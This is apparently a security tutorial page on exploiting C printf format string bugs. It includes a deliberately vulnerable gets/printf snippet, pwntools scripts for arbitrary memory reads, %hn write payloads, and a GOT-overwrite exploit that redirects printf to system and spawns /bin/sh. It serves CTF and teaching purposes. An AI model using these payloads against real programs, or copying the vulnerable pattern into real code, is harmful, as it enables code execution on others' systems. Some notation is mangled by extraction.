Format Strings
[AD REMOVED]
Basic Information
In C printf
is a function that can be used to print some string. The first parameter this function expects is the raw text with the formatters. The following parameters expected are the values to substitute the formatters from the raw text.
The vulnerability appears when an attacker text is used as the first argument to this function. The attacker will be able to craft a special input abusing the printf format string capabilities to read and write any data in any address (readable/writable). Being able this way to execute arbitrary code.
Formatters:
%08x —> 8 hex bytes
%d —> Entire
%u —> Unsigned
%s —> String
%n —> Number of written bytes
%hn —> Occupies 2 bytes instead of 4
<n>$X —> Direct access, Example: ("%3$d", var1, var2, var3) —> Access to var3
Examples:
- Vulnerable example:
char buffer[30];
gets(buffer); // Dangerous: takes user input without restrictions.
printf(buffer); // If buffer contains "%x", it reads from the stack.
- Normal Use:
- With Missing Arguments:
Accessing Pointers
The format %<n>$x
, where n
is a number, allows to indicate to printf to select the n parameter (from the stack). So if you want to read the 4th param from the stack using printf you could do:
and you would read from the first to the forth param.
Or you could do:
and read directly the forth.
Notice that the attacker controls the pr
intf
parameter, which basically means that his input is going to be in the stack when printf
is called, which means that he could write specific memory addresses in the stack.
[!CAUTION] An attacker controlling this input, will be able to add arbitrary address in the stack and make
printf
access them. In the next section it will be explained how to use this behaviour.
Arbitrary Read
It's possible to use the formatter $n%s
to make printf
get the address situated in the n position, following it and print it as if it was a string (print until a 0x00 is found). So if the base address of the binary is 0x8048000
, and we know that the user input starts in the 4th position in the stack, it's possible to print the starting of the binary with:
from pwn import *
p = process('./bin')
payload = b'%6$p' #4th param
payload += b'xxxx' #5th param (needed to fill 8bytes with the initial input)
payload += p32(0x8048000) #6th param
p.sendline(payload)
log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||'
[!CAUTION] Note that you cannot put the address 0x8048000 at the begining of the input because the string will be cat in 0x00 at the end of that address.
Arbitrary Write
The formatter $<num>%n
writes the number of written bytes in the indicated address in the \$<num>%n
write an arbitrary number in an arbitrary address.
Fortunately, to write the number 9999, it's not needed to add 9999 "A"s to the input, in order to so so it's possible to use the formatter %.<num-write>%<num>$n
to write the number <num-write>
in the address pointed by the num
position.
AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
AAAA.%500\$08x —> Param at offset 500
However, note that usually in order to write an address such as 0x08049724
(which is a HUGE number to write at once), it's used $hn
instead of $n
. This allows to only write 2 Bytes. Therefore this operation is done twice, one for the highest 2B of the address and another time for the lowest ones.
Therefore, this vulnerability allows to write anything in any address (arbitrary write).
In this example, the goal is going to be to overwrite the address of a function in the GOT table that is going to be called later. Although this could abuse other arbitrary write to exec techniques:
{{#ref}} ../arbitrary-write-2-exec/ {{#endref}}
We are going to overwrite a function that receives its arguments from the user and point it to the system
function.\
As mentioned, to write the address, usually 2 steps are needed: You first writes 2Bytes of the address and then the other 2. To do so $hn
is used.
- HOB is called to the 2 higher bytes of the address
- LOB is called to the 2 lower bytes of the address
Then, because of how format string works you need to write first the smallest of [HOB, LOB] and then the other one.
If HOB < LOB\
[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]
If HOB > LOB\
[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]
HOB LOB HOB_shellcode-8 NºParam_dir_HOB LOB_shell-HOB_shell NºParam_dir_LOB
python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'
Pwntools Template
You can find a template to prepare a exploit for this kind of vulnerability in:
{{#ref}} format-strings-template.md {{#endref}}
Or this basic example from here:
from pwn import *
elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
libc.address = 0xf7dc2000 # ASLR disabled
p = process()
payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)
p.clean()
p.sendline('/bin/sh')
p.interactive()
Other Examples & References
- https://ir0nstone.gitbook.io/notes/types/stack/format-string
- https://www.youtube.com/watch?v=t1LH9D5cuK4
- https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html
- 32 bit, no relro, no canary, nx, no pie, basic use of format strings to leak the flag from the stack (no need to alter the execution flow)
- https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html
- 32 bit, relro, no canary, nx, no pie, format string to overwrite the address
fflush
with the win function (ret2win) - https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html
- 32 bit, relro, no canary, nx, no pie, format string to write an address inside main in
.fini_array
(so the flow loops back 1 more time) and write the address tosystem
in the GOT table pointing tostrlen
. When the flow goes back to main,strlen
is executed with user input and pointing tosystem
, it will execute the passed commands.
[AD REMOVED]